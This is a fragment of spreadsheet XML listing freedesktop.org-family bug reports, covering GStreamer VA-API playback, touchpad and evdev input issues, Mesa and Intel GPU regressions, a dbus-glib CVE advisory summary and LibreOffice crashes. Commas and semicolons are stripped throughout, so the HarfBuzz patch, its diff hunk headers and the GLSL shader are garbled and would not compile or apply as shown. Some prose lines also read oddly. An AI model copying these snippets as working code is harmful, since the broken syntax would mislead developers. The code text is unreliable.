    - http://www.sintel.org/download
    - Download the HD 1080 mkv-- for testing I re-muxed the video stream into an MP4 container without transcode and has been working fine for months
  * Kill all Xorg servers or boot to 'runlevel 3' text mode
  * Set LIBVA_DRIVERS_PATH if necessary
  * Set LD_LIBRARY_PATH if necessary
  * For my setup /wld/install is the wayland stack sandbox and is reflected at build time
    - --prefix=/wld/install
  * Run `vainfo` make sure output is sane
REPRODUCE:
  * Launch weston kms
    - weston-launch -- -i0
    - the arguments will prevent display from sleeping
  * gst-launch-1.0 filesrc location=Sintel.2010.1080p.mp4 ! \
      qtdemux ! vaapidecode ! vaapisink
EXPECTED: The video plays back in a window-- this pipeline has worked for months. If using a software decode pipeline it plays back.
ACTUAL: gst-launch exits without ever playing the video or displaying a single frame of the video no errors reported.
STDOUT:
libva info: VA-API version 0.34.0
libva info: va_getDriverName() returns 0
libva info: Trying to open /wld/install/lib/dri/i965_drv_video.so
libva info: Found init function __vaDriverInit_0_34
libva info: va_openDriver() returns 0
Setting pipeline to PAUSED ...
Pipeline is PREROLLING ...
/GstPipeline:pipeline0/GstVaapiDecode:vaapidecode0.GstPad:sink: caps = video/x-h264 stream-format=(string)avc alignment=(string)au level=(string)4.1 profile=(string)high codec_data=(buffer)01640029ffe1001e67640029acc8601e01a7e226a04040280000030008000003018478c18cd001000668e97b132130 width=(int)1920 height=(int)818 framerate=(fraction)500/21 pixel-aspect-ratio=(fraction)1/1
/GstPipeline:pipeline0/GstVaapiDecode:vaapidecode0.GstPad:src: caps = video/x-surface type=(string)vaapi opengl=(boolean)true width=(int)1920 height=(int)832 framerate=(fraction)500/21 pixel-aspect-ratio=(fraction)1/1
/GstPipeline:pipeline0/GstVaapiSink:vaapisink0.GstPad:sink: caps = video/x-surface type=(string)vaapi opengl=(boolean)true width=(int)1920 height=(int)832 framerate=(fraction)500/21 pixel-aspect-ratio=(fraction)1/1
/GstPipeline:pipeline0/GstVaapiDecode:vaapidecode0.GstPad:src: caps = video/x-surface type=(string)vaapi opengl=(boolean)true width=(int)1920 height=(int)832 framerate=(fraction)500/21 pixel-aspect-ratio=(fraction)1/1
/GstPipeline:pipeline0/GstVaapiSink:vaapisink0.GstPad:sink: caps = video/x-surface type=(string)vaapi opengl=(boolean)true width=(int)1920 height=(int)832 framerate=(fraction)500/21 pixel-aspect-ratio=(fraction)1/1
Pipeline is PREROLLED ...
Setting pipeline to PLAYING ...
New clock: GstSystemClock
Got EOS from element pipeline0.
Execution ended after 83922369 ns.
Setting pipeline to PAUSED ...
Setting pipeline to READY ...
Setting pipeline to NULL ...
Freeing pipeline ...
SOFTWARE STACK (select):
wayland (master) 1.2.0-0-g6ef06ad
weston (master) 1.2.0-0-ga684b5a
drm (master) heads/master-0-gfea5408
mesa (master) heads/master-0-g1903129
cairo (master) heads/master-0-g03c81d4
libva (master) heads/master-0-gd2dbc3f
intel-driver (master) heads/master-0-g8bf8075
gstreamer (1.0) heads/1.0-0-g80431b4
gst-plugins-base (1.0) heads/1.0-0-gd11092d
gst-plugins-good (1.0) heads/1.0-0-g82c342f
gst-plugins-bad (1.0) heads/1.0-0-gcbd8367
gst-ffmpeg (1.0) heads/1.0-0-g78b1196
gstreamer-vaapi (master) heads/master-0-g0b1a97c
KERNEL:
Linux 3.9.8-100.fc17.x86_64 #1 SMP Thu Jun 27 19:19:57 UTC 2013 x86_64</t>
  </si>
  <si>
    <t>changzhix.wei</t>
  </si>
  <si>
    <t>joe.konno</t>
  </si>
  <si>
    <t>XORG-21714</t>
  </si>
  <si>
    <t>Swap axes doesn't work as expected?</t>
  </si>
  <si>
    <t>Created attachment 25816
script to rotate input using xinput commands
I'm developing a kernel module for using the integrated touchscreen in fujitsu laptops u810 and p1260.
The module works very well and I'm using evdev to send the events to see http://spareinfo.blogspot.com/2009/05/linux-on-u810-p1620-touchscreen-iv.html for the code of the module.
Those laptops also allow screen rotation since using evdev I implemented a screen rotation screen based on xinput (see attached file for the actual code) but after rotation touch accuracy was not good.
I see that on fixed bugs listd you have:
009-02-16	Swap axes after scaling not before.	Peter Hutterer
but even I verified I was using a patched version (I'm using ubutnu jaunty updated as of today) after screen rotation accuracy was not good there was a small displcement between the cursor position and the place where I touched the screen.
Thus I had to implement coordinates-calculation based on screen rotation inside the driver which is working very well.
So the bug is: is it axes swapping correctly implemented in evdev? In my experience not.</t>
  </si>
  <si>
    <t>zzmiq2</t>
  </si>
  <si>
    <t>XORG-7934</t>
  </si>
  <si>
    <t>UYVY broken in the radeon driver</t>
  </si>
  <si>
    <t>Hello. I'm trying to run a megadrive emulator for 
linux(http://www.ghostwhitecrab.com/generator/) which uses the UYVY overlay 
and the output is not what you would expect.I've tested with the fglrx driver 
and the image is ok.I'm running the radeon driver from git and Xorg 7.1. 
http://roms.consolemul.com/index.php?machine=15 this website has public domain 
roms which i've been testing.
Thank you</t>
  </si>
  <si>
    <t>waiha_othafa</t>
  </si>
  <si>
    <t>DBUS-103737</t>
  </si>
  <si>
    <t>Make use of SO_PEERGROUPS in order to populate list of auxiliary groups</t>
  </si>
  <si>
    <t>Recent linux kernels (linux-v4.13 and newer) allow for getting a list of auxiliary groups of a socket peer in a race-free way using SO_PEERGROUPS getsockopt option. For more details on SO_PEERGROUPS see the commit message
https://patchwork.ozlabs.org/patch/778713/
dbus-daemon currently uses getgrouplist() when it is available. We should use SO_PEERGROUPS if possible and fallback to getgrouplist() otherwise.</t>
  </si>
  <si>
    <t>msekleta</t>
  </si>
  <si>
    <t>TELEPATHY-68712</t>
  </si>
  <si>
    <t>connectivity code is far too complicated</t>
  </si>
  <si>
    <t>In theory Mission Control used to support multiple connectivity backends with pluggability and and and. (In practice I don't think it ever worked.)
Now that I have a branch (Bug #56635) to use GNetworkMonitor (which is also pluggable) it seems like a good time to cut the complexity:
 src/Makefile.am              |   7 +-
 src/connectivity-monitor.c   |  21 ++-
 src/kludge-transport.c       | 268 --------------------------------
 src/kludge-transport.h       |  61 --------
 src/mcd-account-connection.c |  70 ++++-----
 src/mcd-account-manager.c    |  23 ++-
 src/mcd-account-manager.h    |   4 +
 src/mcd-account-priv.h       |   3 -
 src/mcd-account.c            | 175 +++++++++++++--------
 src/mcd-account.h            |  15 +-
 src/mcd-channel.c            |   1 -
 src/mcd-channel.h            |   7 -
 src/mcd-connection-plugin.h  |  50 ------
 src/mcd-dispatcher.h         |  15 --
 src/mcd-manager.h            |   6 -
 src/mcd-master-priv.h        |   6 -
 src/mcd-master.c             | 361 ++-----------------------------------------
 src/mcd-master.h             |  23 +--
 src/mcd-operation.c          |  39 ++---
 src/mcd-transport.c          | 188 ----------------------
 src/mcd-transport.h          |  83 ----------
 21 files changed 231 insertions(+) 1195 deletions(-)
(Admittedly that figure includes some other refactoring on the way.)</t>
  </si>
  <si>
    <t>DRI-67062</t>
  </si>
  <si>
    <t>[HSW ULT bisected] Glbenchmark2.7.0 EgyptHDoffscreen performance reduce by 10%</t>
  </si>
  <si>
    <t>System Environment:       
----------------------------------------------
Platform: HSW ULT 
Libdrm:	(master)libdrm-2.4.46-2-gfea5408098c3c3057958e85ea9d7146f0b08749e
Mesa:	(master)148f0deb065d8b64e15f951063fac40650ac257a
Xserver:	(master)xorg-server-1.14.99.1-137-g74469895e39fa38337f59edd64c4031ab9bb51d8
Xf86_video_intel:(master)2.21.12-12-g6c8b15d321044d4a81cb187cc5e1ac094eb82367
Cairo:	(master)03c81d414d4edb710c91f96ddb7dbf73e5432583
Libva:	(staging)6ba83cd306629e7579912627edab7a86d8c9ae1c
Libva_intel_driver: (staging)1caf179b1425b13cacaa421c688c6df8369668c6
Kernel:	(drm-intel-next-queued)8f588cfc349bbbd8ae62a13679b9efba41645064
Bug detailed description:
----------------------------------------------
Glbenchmark2.7.0 Glbenchmark2.7.0 EgyptHDoffscreen performance reduce by 10% on HSW ULT.
The problem doesnâ€™t exist on HSW desktop and IVB. please see dmesg and Xorg.0 attached.
It's Kernel(-intel-next-queued) regression. By bisected show that 0d8ff15e9 is the first bad commit.
commit 0d8ff15e9a15f2b393e53337a107b7a1e5919b6d
Author: Ben Widawsky 
Date:   Thu Jul 4 11:02:03 2013 -0700
drm/i915/hsw: Set correct Haswell PTE encodings.
Performance
----------------------------------------------
                                             50b44a4   0d8ff1
EgyptHD_C24Z16_FixedTime_Offscreen              96       86 
TRex_C24Z16_FixedTimeStep_Offscreen             56       50
Reproduce steps:
---------------------------------------------
1 xinit&amp;
2 vblank_mode=0 ./GLBenchmark -data ../../data/  -w 1920 -h 1080 -t 2701101</t>
  </si>
  <si>
    <t>DBUS-60916</t>
  </si>
  <si>
    <t>CVE-2013-0292: authentication bypass due to insufficient checks in dbus-glib &lt; 0.100.1</t>
  </si>
  <si>
    <t>Copied from the advisory I just sent out:
Sebastian Krahmer discovered and published an authentication bypass
vulnerability in pam_fprintd caused by a bug in dbus-glib. It is
possible that other users of dbus-glib can be exploited in the same
way. CVE-2013-0292 has been allocated for this vulnerability.
This vulnerability is fixed in dbus-glib version 0.100.1 by git commit
166978a. All users of dbus-glib should upgrade.
The D-Bus maintainers consider use of dbus-glib to be deprecated. We
encourage GLib application and library authors to switch to GDBus which
has been part of GLib since 2.26.
Thanks to Sebastian Krahmer and Bastien Nocera for bringing this
vulnerability to our attention and the Red Hat Security Response Team
for allocating a CVE ID.</t>
  </si>
  <si>
    <t>SYSTEMD-90822</t>
  </si>
  <si>
    <t>logind: Add a udev rule to tag all DRM cards with master-of-seat</t>
  </si>
  <si>
    <t>Patch attached to add a generic rule to tag DRM cards as master-of-seat. Not entirely sure if this is the right place for the rule or whether it should go in (for example) rules installed by VirtualBox itself (in the VirtualBox guest additions which install the vboxvideo driver).
See the commit message for a full explanation.</t>
  </si>
  <si>
    <t>FREEDESKTOP.ORG-15993</t>
  </si>
  <si>
    <t>Reenable the 'sandmann' acount</t>
  </si>
  <si>
    <t>Created attachment 16605
RSA key
In order to prevent the terrorists from winning please associate this GPG key with the 'sandmann' account. Also please associate the to-be-attached RSA key.</t>
  </si>
  <si>
    <t>BEIGNET-95245</t>
  </si>
  <si>
    <t>Profiler returns garbage (possibly due to 32-bit chroot on 64-bit kernel)</t>
  </si>
  <si>
    <t>In a 32-bit chroot the profiling_exec() test returns garbage: queue_to_submit is always exactly 2**32 nanoseconds while submit_to_start and start_to_end are sometimes exactly 0 and sometimes non-round but obviously wrong (e.g. &gt;60sec failing the test when it visibly took &lt;10sec).
This affects both 1.1.2 and current master.
This does not happen in a 64-bit chroot (I haven't tried a 32-bit kernel as I don't have one set up). Both chroots are Debian unstable (libdrm 2.4.67 llvm 3.7.1) with /dev/dri bind-mounted while the base system is 64-bit Debian stable (linux 3.16 with register whitelist patch). Hardware is i5-3230M.
The comments in intel_gpgpu_read_ts_reg_gen7 and intel_gpgpu_event_get_exec_timestamp (src/intel/intel_gpgpu.c) suggest it is known that 32- and 64-bit systems use different formats for the GPU timestamp.</t>
  </si>
  <si>
    <t>rong.r.yang</t>
  </si>
  <si>
    <t>rebecca_palmer</t>
  </si>
  <si>
    <t>MESA-103999</t>
  </si>
  <si>
    <t>4x MSAA with RG32F shows garbage on triangle edges</t>
  </si>
  <si>
    <t>Created attachment 135833
Bug
On 17.2.6 edges don't resolve correctly in MSAA.
I'm using pResolveAttachments for this.
I could upload a renderdoc trace but it's too big for the tracker (90MB).
Tested on RX470.</t>
  </si>
  <si>
    <t>XORG-24831</t>
  </si>
  <si>
    <t>XRandR multihead fails on NV50</t>
  </si>
  <si>
    <t>Created attachment 30866
Xorg log
When attempting to use xrandr to configure a multihead display X crashes.
I am using an nVidia QuadroFX 570M discrete graphics card.
xorg version: 1.6.5
nouveau kernel module: built from the nouveau git kernel 2.6.31-rc9-g59e32bc
xf86-video-nouveau: 0.0.20091011
I am attaching the Xorg.0.log and xorg.conf from the crash.  There were no relevant kernel errors logged during this time.</t>
  </si>
  <si>
    <t>keaneyw</t>
  </si>
  <si>
    <t>LIBCANBERRA-20926</t>
  </si>
  <si>
    <t>Don't install schemas if gtk is disabled</t>
  </si>
  <si>
    <t>libcanberra.schemas is the gconf hook for canberra-gtk-module so it shouldn't be installed if gtk is disabled in the libcanberra build (no canberra-gtk-module should propagate no pointers to it). Had mentioned this on the mailing list months ago forgot to follow up...patch coming shortly...</t>
  </si>
  <si>
    <t>WAYLAND-96220</t>
  </si>
  <si>
    <t>TP L430 touchpad to barely usable</t>
  </si>
  <si>
    <t>Created attachment 124095
changing window and trying to scroll one line of text
Dear libinput devs
since Debian testing uses libinput by default the touchpad on my Lenovo ThinkPad L430 is very hard to use. It is super sensitive. I had another person use the touchpad for some minutes and it resulted in a pained hand. If you want to scroll one line of text e.g. in your web browser you have to roll your finger tips with a resolution of 1/2 or 1/3 of a millimeter. And you have to keep them there or you scroll a bit back when lifting the fingers. And when scrolling in some applications (e.g. gnome terminal 3.20) holding the touchpad will give you a jittery scrolling (10 - 20 pix up and down). 
I heard the approach of libinput is to have a great default configuration upstream instead of configurability. I like that. So here i am. Wanting to make sure the touchpad is usable for 90% of the people. Although your bug reporting guide only talks about bugs in the traditional sense of misbehaviour i completed all the steps and here my results:
----
Version: 1.3.0-2 (Debian Testing/Stretch)
----
# libinput settings:
$ xinput list-props 4
Device 'Virtual core XTEST pointer':
	Device Enabled (138):	1
	Coordinate Transformation Matrix (140):	1.000000 0.000000 0.000000 0.000000 1.000000 0.000000 0.000000 0.000000 1.000000
	XTEST Device (257):	1
---
# Laptop: Lenovo ThinkPad L430
cat /sys/class/dmi/id/modalias
dmi:bvnLENOVO:bvrG3ETA5WW(2.65):bd10/20/2015:svnLENOVO:pn2464A26:pvrThinkPadL430:rvnLENOVO:rn2464A26:rvrNotDefined:cvnLENOVO:ct10:cvrNotAvailable:
---
Touchpad dimensions: 76mm width 45mm height
Attached is the evemu file. I changed the window and tried to scroll one line only. I hope it helps you to understand how finicky the touchpad is.</t>
  </si>
  <si>
    <t>l-xdg</t>
  </si>
  <si>
    <t>XORG-18950</t>
  </si>
  <si>
    <t>[965 EXA] font corruption</t>
  </si>
  <si>
    <t>Hi in EXA mode with this version of Xorg:
X.Org X Server 1.5.3
Release Date: 5 November 2008
X Protocol Version 11 Revision 0
Build Operating System: Linux_2.6.22.18-server-1mdv Mandriva
I got font corruption on various applications as xmgrace and others. Switching back to XAA mode solves the problem.
The graphic card is:
00:02.1 Display controller: Intel Corporation 82Q963/Q965 Integrated Graphics Controller (rev 02)
and the xorg.conf (with XAA forced) is attached.
Cheers
Christophe.</t>
  </si>
  <si>
    <t>dirteat</t>
  </si>
  <si>
    <t>LIBREOFFICE-50831</t>
  </si>
  <si>
    <t>RTF: FILESAVE empty lines get different font size after reopening document</t>
  </si>
  <si>
    <t>Problem description: 
when saving an document containing multiple empty lines as RTF document the lines have a different font size after opening the document again
Steps to reproduce:
1. create new empty writer document with some text and some empty lines between them
2. format everything as Arial size 10 (initially the size is 12)
3. save as RTF and close the document
4. open the saved RTF file
Current behavior:
text ist Arial 10 the empty lines are Arial 12
(empty lines height changes the layout of the page)
Expected behavior:
everything is Arial 10 
Platform (if different from the browser): 
Windows
bug is also in libreoffice 3.4.3</t>
  </si>
  <si>
    <t>peter.hermsdorf</t>
  </si>
  <si>
    <t>XORG-4285</t>
  </si>
  <si>
    <t>add XGI XP5 and Volari V3 PCI IDs to trident(4)</t>
  </si>
  <si>
    <t>at minimum we should add the ids it'd be even better if someone could test them.</t>
  </si>
  <si>
    <t>POPPLER-22098</t>
  </si>
  <si>
    <t>Incorrect rendering of shadings</t>
  </si>
  <si>
    <t>Poppler 0.10.7 (May 16 2009) incorrectly renders a sample PDF.
Here is the PDF and the image as rendered by poppler:
http://www.acquerra.com.au/poppler/
I thought this might have been an axial shading bug but that is listed as fixed in this release?
regards Anthony</t>
  </si>
  <si>
    <t>awesley</t>
  </si>
  <si>
    <t>FONTCONFIG-3454</t>
  </si>
  <si>
    <t>fc-lang cannot handle CR/LF line endings</t>
  </si>
  <si>
    <t>Hi
fc-lang cannot process the include statement in the *.orth files when they are
saved with DOS line endings (CR/LF).
Regards
Mark</t>
  </si>
  <si>
    <t>LIBREOFFICE-59357</t>
  </si>
  <si>
    <t>Unworkable - Calc continuolsly hanging</t>
  </si>
  <si>
    <t>Libre Office Calc has become unworkable for me since the last update to 3.6.4.3. I don't have to do anything special (even anything at all) and the program hangs. I need to do force quit every few minutes. 
Tried uninstalling and reinstalling but alas no joy. 
Mac OS X Version 10.8.2
2.4GHz Intel Core Due
6GB 667MHz DDR2 SDRAM</t>
  </si>
  <si>
    <t>robert.edgerley</t>
  </si>
  <si>
    <t>MESA-46004</t>
  </si>
  <si>
    <t>[r300g bisected] piglit glsl-fs-discard-02 fails</t>
  </si>
  <si>
    <t>Piglit glsl-fs-discard-02 fails with r300g since:
10937e651222501c0e9f4f44e6b842c261e2edfb is the first bad commit
commit 10937e651222501c0e9f4f44e6b842c261e2edfb
Author: Vincent Lejeune 
Date:   Mon Jan 2 20:17:38 2012 +0100
    glsl_to_tgsi: Use the GLSL compiler's new remove-output-reads pass.
    The existing glsl_to_tgsi::remove_output_read pass did not work properly
    when indirect addressing was involved this commit replaces it with a
    lowering pass that occurs before TGSI code generation.
    Fixes varying-array related piglit tests.
    Signed-off-by: Vincent Lejeune 
    Signed-off-by: Kenneth Graunke 
    Signed-off-by: Dave Airlie 
GPU: RV530
Mesa: df1cd55ebf362948788c04d2fa7da55c80991605
Kernel: 3.2.3
Libdrm: 2.4.31</t>
  </si>
  <si>
    <t>CAIRO-24691</t>
  </si>
  <si>
    <t>Regression in PS/PDF surface when changing page size</t>
  </si>
  <si>
    <t>1.9.5 has a regression in the PS/PDF surfaces when the page size is changed to a size larger the the previous page. The new page is clipped to the same size as the previous page.</t>
  </si>
  <si>
    <t>WAYLAND-91135</t>
  </si>
  <si>
    <t>Two-finger scrolling jumpy with Synaptics touchpad</t>
  </si>
  <si>
    <t>Created attachment 116765
evemu recording
I have an hp Pavilion dm4 with this touchpad:
# Input device name: SynPS/2 Synaptics TouchPad
# Input device ID: bus 0x11 vendor 0x02 product 0x07 version 0x1b1
Two-finger scrolling isn't smooth which drives me back from libinput to the synaptics X11 driver to use edge scrolling (two-finger scrolling isn't smooth there either).
Attached is an evemu recording in which I move my two fingers up and down three times at a normal pace to scroll on a web page. This is with libinput 0.11.0 on Fedora 22.</t>
  </si>
  <si>
    <t>XORG-9790</t>
  </si>
  <si>
    <t>[modesetting] XVideo doesn't work because of double-wide mode</t>
  </si>
  <si>
    <t>After a recent update to the head of the modesetting branch XVideo stopped working for me.  In the server log file I get an error:
Disabling XVideo output because Pipe A is in double-wide mode
(I'll attach a complete log file).
I checked the source and there's a code in i830_display.c with an accompanying comment that explains that the driver switches pipe from single- to double-wide mode (whatever they may be) if the dot clock is &gt;90% of the core speed.
I'm using a 20 widescreen flatpanel with a resolution of 1680x1050 which needs 146.2 MHz dotclock.  It's connected to an I855GM-equipped laptop and the code assumes that the core speed is 133 MHz so obviously the code will trigger the double-wide mode case and disable XVideo.
However I've been running a version from the modesetting branch that I checked out in September 2006 and that version *did* support XVideo in that mode.  I compared the source and the old version appears to have lacked the code to turn double-wide mode on.
So I commented out in the latest version the code that turns double-wide on and tried (I'll attach the patch).  XVideo now appears to be working flawlessly for me.
I don't know if the code is broken or the docs are simply overly conservative or if I'm doing something that is not supposed to work but I just happen to be lucky.  If you decide that it's the last option I'd at least appreciate if you could add a driver option that allows one to override the automatically selected mode as obviously single-wide mode works for some people and being able to use hardware acceleration when watching movies sure is useful (that's what I bought the external monitor for :-).</t>
  </si>
  <si>
    <t>kamil.42920</t>
  </si>
  <si>
    <t>DBUS-36130</t>
  </si>
  <si>
    <t>libdbus docs are uploaded with g-w under default umask</t>
  </si>
  <si>
    <t>Created attachment 45473
When uploading docs use rsync -p to set permissions
It turns out that rsync --chmod means pretend the source files had already had this chmod operation applied to them and not chmod the destination files like you'd expect.
As a result the -p (--perms) option is also needed so that rsync will preserve the modified permissions. Otherwise the docs will not be group-writeable as intended and only the person who made the previous upload will be able to upload them next time.</t>
  </si>
  <si>
    <t>LIBREOFFICE-83045</t>
  </si>
  <si>
    <t>[si-gui] Crash when selecting Testing build</t>
  </si>
  <si>
    <t>Created attachment 105222
Details of unhandled exception
Problem description: si-gui crash when downloading testing build
Step to reproduce:
1. launch si-gui (Version 4.2.3.1)
2. select Testing build (Version test in French)
3. click on Begin download
Actual result:
=&gt; crash with an error Unhandled exception: Count cannot be lass than zero. Parameter name: count.
Details are included in attached text file.
I suppose that there is no testing build these days.</t>
  </si>
  <si>
    <t>FONTCONFIG-107244</t>
  </si>
  <si>
    <t>Symlinks are broken</t>
  </si>
  <si>
    <t>See https://bugs.chromium.org/p/chromium/issues/detail?id=857511#c31</t>
  </si>
  <si>
    <t>DRI-107877</t>
  </si>
  <si>
    <t>deepin-desktop: xdg-email: no method available for opening 'mailto:'</t>
  </si>
  <si>
    <t>HOW TO REPRODUCE:
Using Deepin as desktop environment in the Terminal enter xdg-email.
RESULT:
xdg-email: no method available for opening 'mailto:'
WORK AROUND:
1. sudo nano /usr/bin/xdg-email
2. Under the line DEEPIN|Deepin|deepin) change the variable DE to gnome3</t>
  </si>
  <si>
    <t>LIBREOFFICE-32957</t>
  </si>
  <si>
    <t>new report through wizard: cancel =&gt; abort/segfault</t>
  </si>
  <si>
    <t>Created attachment 41832
error message on stderr
When creating a new report using the wizard if one clicks the cancel button when it asks for the fields (the very first question) the whole of libreoffice aborts and coredumps.
I'm using the Debian package version 1:3.3.0~rc2-3.
Precise instructions to reproduce:
 - open a Base document
 - click reports
 - click Use wizard to Create Report
 - if prompted for a password enter it and click OK
 - now it asks which query/table the report should be based on and which columns should appear. Just click the Cancel button.
The whole of LibreOffice immediately exits and coredumps.
Expected behaviour: creating the report is cancelled but LibreOffice continues to work correctly and does not close any other document.</t>
  </si>
  <si>
    <t>MESA-84539</t>
  </si>
  <si>
    <t>brw_fs_register_coalesce.cpp:183: bool fs_visitor::register_coalesce(): Assertion `src_size &lt;= 11' failed.</t>
  </si>
  <si>
    <t>Running piglit inside virgl on master this happened
GLSL: #version 130
#extension GL_ARB_fragment_coord_conventions : enable
layout(origin_upper_left ) in vec4 gl_FragCoord
out vec4 out_c0
out vec4 out_c1
out vec4 out_c2
out vec4 out_c3
out vec4 out_c4
out vec4 out_c5
out vec4 out_c6
out vec4 out_c7
vec4 temps[4]
uniform vec4 fsconst0[4]
uniform sampler2D fssamp0
void main(void)
{
temps[0] = vec4(((gl_FragCoord)))
temps[0].y = float(((gl_FragCoord) * (fsconst0[3].zzzz) + (fsconst0[3].wwww)).y)
temps[1].yzw = vec3(((vec4(0000)).yzw))
temps[2].xy = vec2((( temps[0].xyyy  + (vec4(-0.5-0.5-0.5-0.5)))).xy)
temps[3].x = float(1.0/((fsconst0[1].xxxx)))
temps[2].xy = vec2((( temps[2].xyyy  *  temps[3].xxxx )).xy)
temps[2].xy = vec2(( temps[2].xyyy .xy))
temps[2].x = float(texture(fssamp0  temps[2] .xy))
temps[2].x = float((( temps[2].xxxx  +  -temps[0].zzzz )).x)
temps[2].x = float((abs( temps[2].xxxx )))
temps[1].x = float((((fsconst0[2].xxxx) *  temps[2].xxxx )).x)
out_c0 = vec4(( temps[1] ))
gl_FragDepth = float(( temps[0].zzzz .z))
out_c1 = out_c0
out_c2 = out_c0
out_c3 = out_c0
out_c4 = out_c0
out_c5 = out_c0
out_c6 = out_c0
out_c7 = out_c0
}
(gdb) up
#4  0x00007fa9f1ba1fa2 in fs_visitor::register_coalesce (this=this@entry=0x7fff0eac78a0)
    at brw_fs_register_coalesce.cpp:183
183	         assert(src_size &lt;= MAX_SAMPLER_MESSAGE_SIZE)
(gdb) print src_size
$1 = 12
(gdb) list
178	
179	      if (reg_from != inst-&gt;src[0].reg) {
180	         reg_from = inst-&gt;src[0].reg
181	
182	         src_size = virtual_grf_sizes[inst-&gt;src[0].reg]
183	         assert(src_size &lt;= MAX_SAMPLER_MESSAGE_SIZE)
184	
185	         assert(inst-&gt;src[0].width % 8 == 0)
186	         channels_remaining = src_size
187	         memset(mov 0 sizeof(mov))
(gdb) print inst-&gt;src[0].reg
$2 = 25
(gdb) print inst
$3 = (fs_inst *) 0x7faa14fed030
(gdb) print *inst
$4 = { = { = {next = 0x7faa1577e670 prev = 0x7faa15754d00} ir = 0x0 annotation = 0x0 
    texture_offset = 0 offset = 0 mlen = 0 '\000' base_mrf = 0 '\000' target = 0 '\000' 
    opcode = SHADER_OPCODE_LOAD_PAYLOAD conditional_mod = BRW_CONDITIONAL_NONE predicate = BRW_PREDICATE_NONE 
    predicate_inverse = false writes_accumulator = false force_writemask_all = false no_dd_clear = false 
    no_dd_check = false saturate = false} dst = { = {file = GRF type = BRW_REGISTER_TYPE_F reg = 11 
      reg_offset = 0 fixed_hw_reg = {type = BRW_REGISTER_TYPE_UD file = 0 nr = 0 subnr = 0 negate = 0 abs = 0 
        vstride = 0 width = 0 hstride = 0 address_mode = 0 pad0 = 0 dw1 = {bits = {swizzle = 0 writemask = 0 
            indirect_offset = 0 pad1 = 0} f = 0 d = 0 ud = 0}} negate = false abs = false} subreg_offset = 0 
    reladdr = 0x0 width = 8 '\b' effective_width = 8 '\b' stride = 1 '\001'} src = 0x7faa14fece10 sources = 12 '\f' 
  exec_size = 8 '\b' flag_subreg = 0 '\000' regs_written = 12 '\f' eot = false header_present = false 
  shadow_compare = false force_uncompressed = false force_sechalf = false pi_noperspective = false}
(gdb) print virtual_grf_sizes
$5 = (int *) 0x7faa15954010
(gdb) print virtual_grf_sizes[25]
$6 = 12</t>
  </si>
  <si>
    <t>XKEYBOARD-CONFIG-9752</t>
  </si>
  <si>
    <t>Can't type TILDE by pressing the button once...</t>
  </si>
  <si>
    <t>Hi.
I have a problem with the tilde.
On the german keyboard layout you have to hold Alt Gr and then type the + * ~ key to create the tilde sign.
When I want do do this in a konsole that I opened with Xming I have to type that  key two times before the tilde appears.
How can this be fixed?
Kind Regards
Tim</t>
  </si>
  <si>
    <t>U220053</t>
  </si>
  <si>
    <t>TELEPATHY-42652</t>
  </si>
  <si>
    <t>Subject interface needs to define more unknowns for properties</t>
  </si>
  <si>
    <t>ActorHandle and Timestamp don't define values for when they are unknown.</t>
  </si>
  <si>
    <t>MESA-84627</t>
  </si>
  <si>
    <t>(bisected) 32bit corruption with PIPE_USAGE_STREAM reverted</t>
  </si>
  <si>
    <t>As Michel asks me here https://bugs.freedesktop.org/show_bug.cgi?id=82050#add_comment
&gt; (In reply to comment #65)
&gt; Keep in mind that revert broke 32bit complitely lot of corruption :)
&gt;I haven't been able to reproduce that. If you still can please file a bug for &gt;it as there's nothing preventing the kernel from using GTT instead of VRAM when &gt;the latter is full.
 So i can reproduce it today too on 32bit (64bit is not affected at least not by corruption) drm-next-3.18 kernel 3.17.rc7 current mesa git and reverted this:
 http://lists.freedesktop.org/archives/mesa-dev/2014-August/066746.html
 For the mesa part i already bisected that it starts at (might be same reason as bug 83436 but let alone that one for now):
 http://cgit.freedesktop.org/mesa/mesa/commit/?id=07c65b85eada8dd34019763b6e82ed4257a9b4a6
 For the kernel part not bisected yet but it is somewhere in between 3.16 and 3.17-rc1 so hopefully i will bisect that maybe today :)</t>
  </si>
  <si>
    <t>HARFBUZZ-23976</t>
  </si>
  <si>
    <t>memory leak in Free_BaseArray</t>
  </si>
  <si>
    <t>Free_BaseArray fails to free the DeltaValue arrays in the HB_AnchorFormat3_ structure.
Suggested patch (tested in my test harness appears to work fine):
--- a/src/harfbuzz/src/harfbuzz-gpos.c
+++ b/src/harfbuzz/src/harfbuzz-gpos.c
@@ -20586 +20587 @@ static void  Free_BaseArray( HB_BaseArray*  ba
 {
   HB_BaseRecord  *br
   HB_Anchor      *bans
+  int i
   HB_UNUSED(num_classes)
@@ -20656 +206618 @@ static void  Free_BaseArray( HB_BaseArray*  ba
   {
     br    = ba-&gt;BaseRecord
+    for (i = 0 i BaseCount i++)
+    {
+      HB_Anchor* a = br[i].BaseAnchor
+      if (a-&gt;PosFormat == 3)
+      {
+        HB_UShort* d = a-&gt;af.af3.XDeviceTable.DeltaValue
+        FREE( d )
+        d = a-&gt;af.af3.YDeviceTable.DeltaValue
+        FREE( d )
+      }
+    }
+
     if ( ba-&gt;BaseCount )
     {
       bans = br[0].BaseAnchor</t>
  </si>
  <si>
    <t>graham.asher</t>
  </si>
  <si>
    <t>POPPLER-31687</t>
  </si>
  <si>
    <t>Transparency &amp; clipping errors in PDF</t>
  </si>
  <si>
    <t>poppler 0.15.1
1) the gray square around the projector lens should be mostly transparent and clipped
2) the orange mobile phone on the right side is also misrendered the rectangle should be clipped to the outside of the phone and probably also somewhat transparent</t>
  </si>
  <si>
    <t>TELEPATHY-65658</t>
  </si>
  <si>
    <t>gabbletest: add hooks for hazetest</t>
  </si>
  <si>
    <t>These are the changes I needed to make to let hazetest.py use a verbatim copy of gabbletest.py see .</t>
  </si>
  <si>
    <t>TELEPATHY-21335</t>
  </si>
  <si>
    <t>Implement Group self-handle removal reasons</t>
  </si>
  <si>
    <t>Whenever the self-handle is removed for a reason other than RENAMED Tp::Channel should remember the reason and other details (in particular the actor and any D-Bus error name).
If the channel closes thereafter the reason and other details should be used to construct a more suitable error name than Cancelled. (For instance if there is a D-Bus error name use that if not and the reason is None use Cancelled if the actor is the self handle or Terminated otherwise and so on.)
telepathy-glib has similar logic which can be used as a reference.</t>
  </si>
  <si>
    <t>SYSTEMD-46423</t>
  </si>
  <si>
    <t>systemd-nspawn: cryptic error when fails due to lack of adaquate namespace support</t>
  </si>
  <si>
    <t>Created attachment 57429
hint the user of why clone() might fail
When running systemd-nspawn I got this cryptic error:
clone() failed: Invalid argument
Someone trying to help in #systemd was clueless as well even when given the above error message.
